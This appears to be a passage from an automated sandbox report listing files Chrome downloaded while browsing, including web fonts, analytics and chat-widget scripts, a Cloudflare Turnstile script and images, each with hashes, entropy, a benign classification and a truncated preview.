                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=Lato:100,100italic,300,300italic,400,400italic,700,700italic,900,900italic%7CMontserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7CPT+Sans:400,400italic,700,700italic%7CDM+Sans:regular,italic,500,500italic,700,700italic"
                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKK58VXh.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKy58Q.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 500;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKK58VXh.woff2) format('woff2');. unicode
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5418
                                                                                                                                                                                                        Entropy (8bit):7.373501308161445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:uN26MT0D5MdtbZPAVwzVqERvyf39/EVari/6fm42re:hYNMtKwMOKf39MJyu42re
                                                                                                                                                                                                        MD5:74F6DCA86EB53FFF7E6EF1459B5CEEDC
                                                                                                                                                                                                        SHA1:B2632F4A47F550ABC7134A811148275FF913178C
                                                                                                                                                                                                        SHA-256:1EAB2C770DAC64B5F3DCB7FF02D89B0F30C756136777A3784D51B41B33CD2B54
                                                                                                                                                                                                        SHA-512:84360F96EB1FF568CE8474549C537006F5DB645FAB35725DA582960D1B9BAFB239245DFE89BFBEDA2C20770B5E3D728A158CCAEBF9DD246BB7C65178EE9EC942
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (45809)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):45810
                                                                                                                                                                                                        Entropy (8bit):5.4018992831833454
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:5CXgv9mZHawT5khQvzl4P7xdHd32t1EGkLu+6QStSplSruqEmm1LiIPTgqqXyzc9:d+H99khQbmct6nLu+HIruYvL
                                                                                                                                                                                                        MD5:F8E18E23484E55C313A4A8F8615359CA
                                                                                                                                                                                                        SHA1:CFE4D85935005C68FF04B58E236BCED0B0A41D7B
                                                                                                                                                                                                        SHA-256:3F0166BDE3365C67AEEB6ADFB6DE569399BA9941A39EE0EE6C4DC086494DAF99
                                                                                                                                                                                                        SHA-512:CFCAF01D483D6B6CFE9E165D1CA87CB720823087E20E5351C032AE7142E4A599384AB8D034949255ADA8D46FE6F3F66F13E4612A060B7EE036F1121111738F9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/e7cf9275f425/api.js
                                                                                                                                                                                                        Preview:"use strict";(function(){function Dt(e,r,a,o,c,u,g){try{var _=e[u](g),s=_.value}catch(f){a(f);return}_.done?r(s):Promise.resolve(s).then(o,c)}function Ut(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(s){Dt(u,o,c,g,_,"next",s)}function _(s){Dt(u,o,c,g,_,"throw",s)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Tr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4758), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4758
                                                                                                                                                                                                        Entropy (8bit):5.798215354902069
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUFjKGAiH:1DY0hf1bT47OIqWb1gjKViH
                                                                                                                                                                                                        MD5:554A131BA1A7BF1419A08682FDF87CDE
                                                                                                                                                                                                        SHA1:4344D5AD03D9D1FA2448AD3861D24A69CADA7D76
                                                                                                                                                                                                        SHA-256:510AB3E3A964C25ECF495B4AC9033D35B080EC968C3722DCD69852EFE336FB5B
                                                                                                                                                                                                        SHA-512:1891AAD8507A1299B2E3FFFF85F74724DB9D2FC4EA1252E50DD264A2B173AE79D2EA56ACC769741616DEEB777D29A4C65D88D20D7975E5C9CEEB7FF352583A4D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):107348
                                                                                                                                                                                                        Entropy (8bit):5.264039514215191
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:ReqhZjvnk1z3vrsja9cxEf6+6Glby/XJ42qbVTE4wLyPe9VAs:R1hZjKJ1y/Z4rbrwLPVAs
                                                                                                                                                                                                        MD5:114785899CEB423273FCC17AAAD202E9
                                                                                                                                                                                                        SHA1:CE53389286218FE6D7CE1EB86208074C024ACCA5
                                                                                                                                                                                                        SHA-256:C8C302716CF94980A0D77E614D9FB6C430F166B5EF7C42B7C382771955E52BA6
                                                                                                                                                                                                        SHA-512:6E357A327420598542BFFEDF8F03F7F4C327469CDC6CC52B39C0B542DA4EF09C6739F46161C8D2796BFA05193D94B47420308CF4F2A50A2F0DF73EE9712544A4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/50.de3b5864.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[50],{"7nmT":function(e,t,n){"use strict";!function checkDCE(){if("undefined"!==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"===typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE)}catch(e){console.error(e)}}(),e.exports=n("w/UT")},"w/UT":function(n,r,a){"use strict";var i=a("ERkP"),o=a("maj8"),u=a("jiMj");function x(e){for(var t=arguments.length-1,n="https://reactjs.org/docs/error-decoder.html?invariant="+e,r=0;r<t;r++)n+="&args[]="+encodeURIComponent(arguments[r+1]);!function ba(e,t,n,r,l,a,i,o){if(!e){if(e=void 0,void 0===t)e=Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var u=[n,r,l,a,i,o],c=0;(e=Error(t.replace(/%s/g,function(){return u[c++]}))).name="Invariant Violation"}throw e.framesToPop=1,e}}(!1,"Minified React error #"+e+"; visit %s for the full message or use the non-minified dev
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):18810
                                                                                                                                                                                                        Entropy (8bit):6.034085124410907
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:brJVuh+/cCKS+i3R7AqG1pqVLod/cg8YAmbau9FyEJWtnmdfYxyHW:hVTKFiB1G1nd/7XAmOsWtnswx4W
                                                                                                                                                                                                        MD5:5E8E129DE9BCD04C0506C3538D3F7E47
                                                                                                                                                                                                        SHA1:4D5B055477E4504162673C5E4706458400BE6222
                                                                                                                                                                                                        SHA-256:2DF10F725D75D1B27E0C800F67E014FCA8DAB4575F91E798A5499EFCD9B52B71
                                                                                                                                                                                                        SHA-512:DEEE83F8419F9F811244A57F06CDA2E6DF04D77E5AFBCB439DF1115899F9A2B8BDD7CBF9A0A48E3F573D3EDC09D866295D3928D6C395A4282388270FCC44C0DA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>6</title>. <defs>. <path d="M10.325,0 L107.675,0 C113.37734,0 118,4.62265996 118,10.325 L118,107.675 C118,113.37734 113.37734,118 107.675,118 L10.325,118 C4.62265996,118 0,113.37734 0,107.675 L0,10.325 C0,4.62265996 4.62265996,0 10.325,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" in2="SourceAlpha" operator="out" resu
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (49289)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1008878
                                                                                                                                                                                                        Entropy (8bit):5.418528817114226
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:0fJF6TpiEc6EKjTQYThF0Y9LrnWXuNcEa:0fJF6TpiEfxNSEa
                                                                                                                                                                                                        MD5:66FDCDCE4E09FC0843364E9F0CE9DA27
                                                                                                                                                                                                        SHA1:A205CFC5187567E1F735641F0BE28C931A998210
                                                                                                                                                                                                        SHA-256:8189057C2CD91FD4A9129FBBC7276ADE630F550CC96E99972DEE799A100E5FB7
                                                                                                                                                                                                        SHA-512:7C7D79073ADBAFE1A4B4F5F62591CD28DA04D2E1FDD802E94FACE3D6BC33FF7C86C25F7A790AFA031A594A2A3FD208274A427E823EFF012579DA97EDD3D0AE9B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{49623:function(e,t,r){var n={"./de/messages":[18877,8877],"./en/messages":[20973,973],"./es/messages":[53497,3497],"./fr/messages":[70727,727],"./it/messages":[86713,6713],"./ja/messages":[68817,8817],"./nl/messages":[47089,7089],"./pt/messages":[44601,4601],"./zu/messages":[68892,8892]};function i(e){if(!r.o(n,e))return Promise.resolve().then(function(){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t});var t=n[e],i=t[0];return r.e(t[1]).then(function(){return r(i)})}i.keys=function(){return Object.keys(n)},i.id=49623,e.exports=i},7321:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.authErrorMessages=t.NoUserPoolError=t.AuthError=void 0;let n=r(3446),i=r(67915),o=new n.ConsoleLogger("AuthError");class a extends Error{constructor(e){let{message:r,log:n}=t.authErrorMessages[e];super(r),this.constructor=a,Object.setPrototypeOf(this,a.prototype),this.name="AuthError",
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13063), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13063
                                                                                                                                                                                                        Entropy (8bit):5.5914712509986515
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:z1FrNYuBWyiwkaCRykTCfWU94NDjQj8+24i6gHueo1CNCfWd9PYEN4Ywi1wl:z3KyW0CRy3T9gjQjywZCNSWrkYwv
                                                                                                                                                                                                        MD5:455157CB49065FB85FED54901DDAEB0E
                                                                                                                                                                                                        SHA1:248D056B36813AE68A2179DF92860E07CECD7A34
                                                                                                                                                                                                        SHA-256:7641F066C35D0CA15D4897BFE49D640ED4C143FF8F04030C2020CBB2ACFA7B0B
                                                                                                                                                                                                        SHA-512:290DF8FB129D5A33135E6332C0EE89BAD8225CAF1FB13872D06AFB277C867718E7C5F970E10A25D55FB9B6A2BB27AD48267F16C1DD62BBD78590F4E99890ECF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/29.31d09948.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[29],{"7EA0":function(t,u){t.exports=/[\0-\uD7FF\uE000-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]/},Ckiu:function(t,u){t.exports=/[ \xA0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000]/},EfWO:function(t,u,e){"use strict";var r=e("q3/s"),s=e("s+nu");function Url(){this.protocol=null,this.slashes=null,this.auth=null,this.host=null,this.port=null,this.hostname=null,this.hash=null,this.search=null,this.query=null,this.pathname=null,this.path=null,this.href=null}u.parse=urlParse,u.resolve=function urlResolve(t,u){return urlParse(t,!1,!0).resolve(u)},u.resolveObject=function urlResolveObject(t,u){return t?urlParse(t,!1,!0).resolveObject(u):u},u.format=function urlFormat(t){s.isString(t)&&(t=urlParse(t));return t instanceof Url?t.format():Url.prototype.format.call(t)},u.Url=Url;var n=/^([a-z0-9.+-]+:)/i,h=/:[0-9]*$/,o=/^(\/\/?(?!\/)[^\?\s]*)(\?[^\s]*)?$/,a=["{","}","|","\
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 442, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):31919
                                                                                                                                                                                                        Entropy (8bit):7.9788764423882395
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:4sfJBh2L/ydShxAOoeHBLuTCmM/TXgbBv5:bHh2L/vasBLuxugbBh
                                                                                                                                                                                                        MD5:3E112F922519BA097601A7C70AE81F23
                                                                                                                                                                                                        SHA1:BD530C8245F335CC0EFF3C70CA58F683B4B9A0D3
                                                                                                                                                                                                        SHA-256:C8BA665DF858EBBC888579FA8C396873F6BE37B3E3A9E09047B4B7026A0CA187
                                                                                                                                                                                                        SHA-512:D9D79F7635D60AD23DBD03CE612656E16780FD9603884E372B652EF03C011C5EE4DF24026E1A544A5B064EC9A351B7A54CC6DC4D74F249E2345A1BC67A7F99BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/home_banner-p-500.png
                                                                                                                                                                                                        Preview:.PNG........IHDR..............ZD.....PLTELiq.//...........................<>?.................................................................................x...........................................................o........z................p....4(.w...............aD8~......%.....D0....Q;0..........X..h...oP?:40...Y..............Q;....D.....d.pR..@2.............na......aG.~ZBU....._...p..p&uP)......l........y3.qB.f)waW...]*..o.jQ.......a..........'-.tZ......w.cF%......zp.|.e?.....I.......^UM.{...k...?..2.Q..ljkGFG...h...~VY]a.t..M.....{Gi.'.........}..|.....~...6'...-...}x{.............t..l.....P...ltLVr....P]/.....r......b..r.Z..t]y.i.}....g}..V.....5Tn..r..:....CR....6..ktt'..D..K....en..bo}.......bP...MBC..T.pY..q....EO`.F..3...p`...K...7.M.V1.....&tRNS...N......q..I).....1....c................pHYs............... .IDATx..y\.g...(..:]p..vz..b....A!...'p0..L.%.~@.B.VN.`.p.T........K.........GJ..`.X:r.s...9.~..u?O6..@...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (516)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3324
                                                                                                                                                                                                        Entropy (8bit):5.22805047440309
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:35Y2zQVW9KrK+9GL+VGZ+CGbMyFG3tGf6GGMb6GYGDGkM8GdGMGxMbn:pbzQl7PXpMfMZMCMz
                                                                                                                                                                                                        MD5:B129A84A63B146DA00348D2E7C74A9F1
                                                                                                                                                                                                        SHA1:897B78F5610811156F7FD38D831943710FA0AB1D
                                                                                                                                                                                                        SHA-256:C8B1D33E681D001ACCE39331E7330CF090B63A50CCD875D67AB072423786C5FD
                                                                                                                                                                                                        SHA-512:CC5B3E830D539A36B69772C3ACCC272FC2FD34A074D5B693F069C170534EADC519F784211F1AFB76CE7B465A02F74038FC5EF1BF5C4FCC11F8A89F5D95022395
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://use.typekit.net/urt5zuu.css
                                                                                                                                                                                                        Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000007735dac8. * - http://typekit.com/eulas/00000000000000007735dacd. * - http://typekit.com/eulas/00000000000000007735dad8. * - http://typekit.com/eulas/00000000000000007735dada. *. * . 2009-2024 Adobe Systems Incorporated. All Rights Reserved.. */./*{"last_published":"2022-04-19 07:03:14 UTC"}*/..@import url("https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css");..@font-face {.font-family:"adobe-clean";.src:url("https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n4&v=3") format("woff2"),url("https://use.typekit.net/af/c0160f/00000000000000
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5
                                                                                                                                                                                                        Entropy (8bit):1.5219280948873621
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:U8n:U8n
                                                                                                                                                                                                        MD5:83D24D4B43CC7EEF2B61E66C95F3D158
                                                                                                                                                                                                        SHA1:F0CAFC285EE23BB6C28C5166F305493C4331C84D
                                                                                                                                                                                                        SHA-256:1C0FF118A4290C99F39C90ABB38703A866E47251B23CCA20266C69C812CCAFEB
                                                                                                                                                                                                        SHA-512:E6E84563D3A55767F8E5F36C4E217A0768120D6E15CE4D01AA63D36AF7EC8D20B600CE96DCC56DE91EC7E55E83A8267BADDD68B61447069B82ABDB2E92C6ACB6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css
                                                                                                                                                                                                        Preview:/**/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (38072)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):38234
                                                                                                                                                                                                        Entropy (8bit):5.245368391922378
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Ro+E4C3sY5OBUsmadBpBHJm45J4ACZ8CeCJoCkORCDfC6tccQaY7GAjLyLf/jns0:Ro+E75tk7m45J4ACZ8CeCJoCkORCDfC6
                                                                                                                                                                                                        MD5:1D414B3F4FC7F5FEC797CEAB17D2E133
                                                                                                                                                                                                        SHA1:4D9322AD2E0B06FB7F573813C089E5BC26F6FB16
                                                                                                                                                                                                        SHA-256:ABA571489B8EFBC77416A22ABF97A069328AF7352B3319E39CF504AE67406798
                                                                                                                                                                                                        SHA-512:17A4581DD59DA36B022CB4FB4CD3C689D11B14EC2FB4E250A7F02F5024B935EE88CB20EF295EC2278613F81D4CF4D5D58E03E8A20AD23BDB604F906E644F3C32
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*!. * Copyright (c) 2024 Woopra, Inc.. *. * For license information please see https://static.woopra.com/js/w.js.LICENSE.txt. */..!function(){"use strict";function t(t){return void 0===t}var e="object"==typeof global&&global&&global.Object===Object&&global,n="object"==typeof self&&self&&self.Object===Object&&self,i=e||n||Function("return this")(),o=i.Symbol,a=Object.prototype,r=a.hasOwnProperty,s=a.toString,c=o?o.toStringTag:void 0;var u=Object.prototype.toString;var l=o?o.toStringTag:void 0;function h(t){return null==t?void 0===t?"[object Undefined]":"[object Null]":l&&l in Object(t)?function(t){var e=r.call(t,c),n=t[c];try{t[c]=void 0;var i=!0}catch(t){}var o=s.call(t);return i&&(e?t[c]=n:delete t[c]),o}(t):function(t){return u.call(t)}(t)}function d(t){var e=typeof t;return null!=t&&("object"==e||"function"==e)}function f(t){if(!d(t))return!1;var e=h(t);return"[object Function]"==e||"[object GeneratorFunction]"==e||"[object AsyncFunction]"==e||"[object Proxy]"==e}var p=function(){r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5803
                                                                                                                                                                                                        Entropy (8bit):7.964545520142816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:orV+7cEFzXYp3ItK88n7z8CNKT9uSdhYHuXiiFneoBYhk6a4:orV+7rdIpt8c7zJiPSiFneoBYh7L
                                                                                                                                                                                                        MD5:B87660AAB67B38EDD880A9CB8C783DA7
                                                                                                                                                                                                        SHA1:0A3345FB30E5F93552876F4735E5D9A3A2A5F60B
                                                                                                                                                                                                        SHA-256:F6C53A1067FAFC27359AB74474C52598B120603DD3FA363CAAF78A1E93BE3671
                                                                                                                                                                                                        SHA-512:0099F4C0E879143E9A97057B337AD9FD94F717985C2C150E88F9D1650E730BFB98F33C37CABFF302AAF35527B619B2431EF822FA5C3996A4326D2C23DE7FFEF0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB........eIDATx^..p]Wy........b.l.l'.q.;..a ;.....)...$...e.vH&..344..-C(.L..8...@..!IY...b;.,.-k}Z.{w9..u.}..E....x.o......w..;.v^|q-.E....NSf..N-o.&...'.C..2..;....1[.dF.<j.PH.j$...D. .e.>.u...1A..q../1D..<..U...c@tZ...,.1...G00~.e_'....x.......?M...4.Q....@Y.....r8.....U..m..U#..z..A.....0el.?-R.....H~..T..L;..M....._B.).....Q`..<..d..BH.~..'+5...$D.<9.r...;m...>..#l...-@.,A.7.q.l/........}...O....s..|....z(#F.-...n!.....W8.?.#?.G.C.u..\.j...E.5.pvC.I.H..\..~..:."h.G....UYa.LO%3.(.._H..q.8...#.`..=..U.F.,..4..UY.0..<2.&RR.!...F:.-.......!s...N3H....x...Z.z.G.S...#.0bK..+J(R.i.Q...d..j....p.%.o.-...U,...jDfB.yl....kA...J...[..Y...`I..l."Vc$.%.).S.....M....iR.{..b.....o.K....l)0...Y.Ug....|c...O../..u..5....jEl.B.9=.9..[..&4"..a.'q.}.W].iZjBA...!4............)n>.....6d...</2+4...#..@..k....y.CK...PM..6.k..Y.&`..mm.E..h.v<...%...'}...0(...+4"........[.2.4x.."..m.i.r...G...../.Ah.lEc....n.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (37568), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):37568
                                                                                                                                                                                                        Entropy (8bit):5.295748739379976
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:D+2C7C/DbzsKmYlKd/xVCJwhSwnzCVcSCsaW:D+KDbzs55d5iwhSwnmn
                                                                                                                                                                                                        MD5:683AA6D8A155F834A7DE2144789CAF5E
                                                                                                                                                                                                        SHA1:BF797134EC28D757EDD196A7DB795621299E4AEF
                                                                                                                                                                                                        SHA-256:E0A14D1E5656DEA4D1DD61FA372E389A49A1ED5219769FEBB2CE9209DCF8132B
                                                                                                                                                                                                        SHA-512:1B0AD17AF8F4955E5B430CBBA5A38FE677381421E33242710D2A7C6DC36BCC81E1A9F2DD623040C69377AE392FF93FE8C77907AE164D6ABC32D68755DB2FF801
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/1301-2dcedde1f45bf8e0.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1301],{58089:function(e,t,r){"use strict";r.d(t,{Z:function(){return u}});var n=r(7653),o=r(57908),i=r(96890);function a(e){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var l=["className","children","variant"];function c(){return(c=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var u=(0,n.forwardRef)(function(e,t){var r,u,s,f=e.className,p=e.children,d=e.variant,b=void 0===d?"primary":d,y=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)r=i[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var i=Ob
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 442, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
